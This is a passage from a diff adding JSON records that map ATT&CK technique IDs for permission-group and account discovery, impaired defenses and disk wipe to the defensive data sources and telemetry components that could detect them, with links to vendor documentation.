"definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being 
created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + 
"data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + null, + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1069.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + 
"target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + 
"relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "group", + "definition": "Information about collections of accounts or permissions within an organization.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "group enumeration", + "description": "A group was listed.", + "source_data_element": "user", + "relationship": "listed", + "target_data_element": "group" + }, + { + "data_source": "group", + "definition": "Information about collections of accounts or permissions within an organization.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "group metadata", + "description": "Data and information that describe a group and activity around it such as group permissions.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "group" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html" + ], + 
[ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1087.004", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account metadata", + "description": "Data and information that describe a user account and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "user" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or 
script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1087.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account metadata", + "description": "Data and information that describe a user account and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "user" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface 
and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1562", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process termination", + "description": "A process was terminated.", + "source_data_element": "user", + "relationship": "terminated", + "target_data_element": "process" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + 
"data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key deletion", + "description": "A registry key was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key deletion", + "description": "A registry key was deleted.", + "source_data_element": "process", + "relationship": "deleted", + "target_data_element": "windows 
registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key deletion", + "description": "A registry key was deleted.", + "source_data_element": "process", + "relationship": "deleted", + "target_data_element": "windows registry key value" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + 
"source_data_element": "service", + "relationship": "started", + "target_data_element": null + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "service", + "relationship": "stopped", + "target_data_element": null + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "service" + }, + { + "data_source": "sensor health", + "definition": "Information associated with sensors providing data about host system status.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "host status", + "description": "Data from a sensor about the health of a host system sensor", + 
"source_data_element": "sensor health", + "relationship": "contained", + "target_data_element": "host system status" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "command", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "firewall", + "definition": "Information associated with the network security system, running locally on an endpoint or remotely in a cloud environment, that monitors and controls incoming and outgoing network traffic based on predetermined security rules.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Linux", + "macOS", + "Windows", + "Google Workspace" + ], + "data_component": "firewall disable", + "description": "A firewall system was disabled.", + "source_data_element": "user", + "relationship": "disabled", + "target_data_element": "firewall" + }, + { + "data_source": "firewall", + "definition": "Information associated with the network security system, running locally on an endpoint or remotely in a cloud environment, that monitors and controls incoming and outgoing network traffic based on predetermined security rules.", + 
"collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Linux", + "macOS", + "Windows", + "Google Workspace" + ], + "data_component": "firewall rule modification", + "description": "A rule of a firewall system was modified.", + "source_data_element": "user", + "relationship": "added", + "target_data_element": "firewall rule" + }, + { + "data_source": "firewall", + "definition": "Information associated with the network security system, running locally on an endpoint or remotely in a cloud environment, that monitors and controls incoming and outgoing network traffic based on predetermined security rules.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Linux", + "macOS", + "Windows", + "Google Workspace" + ], + "data_component": "firewall rule modification", + "description": "A rule of a firewall system was modified.", + "source_data_element": "user", + "relationship": "removed", + "target_data_element": "firewall rule" + }, + { + "data_source": "firewall", + "definition": "Information associated with the network security system, running locally on an endpoint or remotely in a cloud environment, that monitors and controls incoming and outgoing network traffic based on predetermined security rules.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Linux", + "macOS", + "Windows", + "Google Workspace" + ], + "data_component": "firewall rule modification", + "description": "A rule of a firewall system was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "firewall rule" + }, + { + "data_source": "cloud service", + "definition": "Information about a service available within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + 
"Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "cloud service modification", + "description": "A cloud service was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "cloud service" + }, + { + "data_source": "cloud service", + "definition": "Information about a service available within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "cloud service disable", + "description": "A cloud service was disabled.", + "source_data_element": "user", + "relationship": "disabled", + "target_data_element": "cloud service" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ], + null, + [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7", + "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html", + "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + ], + [ + "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html" + ], + [ + "https://aws.amazon.com", + "https://azure.microsoft.com/en-us/services/" + ] + ] + }, + { + "technique_id": "T1561.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer 
programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + 
"container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "driver", + "definition": "Information associated with device drivers, or computer programs that operate or control a particular type of device that is attached to a computer.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Linux", + "macOS", + "Windows" + ], + "data_component": "driver load", + "description": "A driver (User-mode, kernel-mode) was loaded.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "driver" + }, + { + "data_source": "drive", + "definition": "Information associated with drive storage regions.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "drive access", + "description": "A drive partition was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "drive" + }, + { + "data_source": "drive", + "definition": "Information associated with drive storage regions.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "drive modification", + "description": "A drive partition was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "drive" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + 
"https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/IOKitFundamentals/Features/Features.html", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode" + ], + [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90009" + ] + ] + }, + { + "technique_id": "T1561.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + 
